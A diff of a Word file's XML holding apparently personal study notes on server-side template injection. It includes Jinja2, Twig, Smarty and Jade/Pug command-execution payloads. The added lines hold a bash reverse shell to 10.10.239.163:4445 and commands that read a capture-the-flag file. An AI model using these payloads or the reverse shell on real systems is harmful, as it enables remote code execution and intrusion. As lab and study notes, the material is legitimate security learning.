--- a/SSTI.docx
+++ b/SSTI.docx
@@ -40,21 +40,8 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>Fuzzing: ${{&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>%[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>%’”</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>}}%</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Fuzzing: ${{&lt;%[%’”}}%</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -306,13 +293,8 @@
         </w:numPr>
         <w:spacing w:after="0"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>{{ -</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Used to mark the start of a print statement</w:t>
+      <w:r>
+        <w:t>{{ - Used to mark the start of a print statement</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -417,12 +399,10 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>Os.system</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>(“</w:t>
       </w:r>
@@ -466,12 +446,10 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>Os.popen</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>(“</w:t>
       </w:r>
@@ -481,15 +459,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>”</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>).read</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>()</w:t>
+        <w:t>”).read()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -545,15 +515,7 @@
         <w:t>-</w:t>
       </w:r>
       <w:r>
-        <w:t>1</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>).communicate</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>()</w:t>
+        <w:t>1).communicate()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -582,22 +544,14 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>%}</w:t>
+        <w:t xml:space="preserve"> %}</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">{{ </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>os</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>.system</w:t>
+        <w:t>os.system</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -609,15 +563,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>”</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>) }</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>}</w:t>
+        <w:t>”) }}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -638,15 +584,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t>{{ ‘’.__class_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>_._</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>_</w:t>
+        <w:t>{{ ‘’.__class__.__</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -654,23 +592,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>__[1</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>]._</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>_subclasses_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>_() }</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>}</w:t>
+        <w:t>__[1].__subclasses__() }}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -696,15 +618,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t>{{ ‘’.__class_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>_._</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>_</w:t>
+        <w:t>{{ ‘’.__class__.__</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -777,92 +691,20 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>{{“</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>”._</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>_class_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>_._</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>_mro__[1</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>]._</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>_subclasses__</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>()[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>157</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>].__repr__.__globals__.get</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>(“__builtins__”</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>).get</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>(“__import__</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>”)(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>“subprocess”</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>).check</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>_output(“ls”)}}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Check_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>output</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>“ls -</w:t>
+        <w:t>{{“”.__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get(“__builtins__”).get(“__import__”)(“subprocess”).check_output(“ls”)}}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Check_output</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(“ls -</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -895,31 +737,15 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Subprocess.check_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>output</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>[command, arg1, arg2])</w:t>
+        <w:t>Subprocess.check_output</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>([command, arg1, arg2])</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -944,7 +770,6 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -958,39 +783,15 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>check</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>output</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>[‘ls’, ‘-</w:t>
+        <w:t>check_output</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>([‘ls’, ‘-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1056,6 +857,123 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
+        <w:t>{{['id',""]|sort('</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passthru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>')}}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{{ ["bash -c 'exec bash -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/10.10.239.163/4445 0&gt;&amp;1'", ""] | sort('</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passthru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>') }}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{{['</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pwd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>',""]|sort('</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passthru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>')}}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{{['ls -l /var/www/html',""]|sort('</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passthru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>')}}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{{['ls /var/www/html/flags',""]|sort('</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passthru</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>')}}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{{['cat /var/www/html/flags/5d8af1dc14503c7e4bdc8e51a3469f48.txt',""]|sort('passthru')}}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
         <w:t>Smarty – {‘</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -1095,64 +1013,24 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Jade/Pug - </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>#{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>7*7} = 49; #{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>root.process</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>.mainModule.require(‘child_process’</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>).spawnSync</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>(‘id’</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>).stdout</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Interpolation braces: </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>#{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>}</w:t>
+        <w:t>Jade/Pug - #{7*7} = 49; #{root.process.mainModule.require(‘child_process’).spawnSync(‘id’).stdout}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Interpolation braces: #{}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1169,38 +1047,25 @@
         <w:t>&lt;,&gt; and &amp;</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> to their HTML entity equivalents to prevent XSS – unescaped </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>interpolation !</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>{}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve"> to their HTML entity equivalents to prevent XSS – unescaped interpolation !{}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>spawnSync</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>‘ls -</w:t>
+        <w:t>(‘ls -</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1228,7 +1093,6 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1242,15 +1106,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>command, [</w:t>
+        <w:t>(command, [</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1292,7 +1148,6 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -1306,15 +1161,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>‘ls’, [‘-</w:t>
+        <w:t>(‘ls’, [‘-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
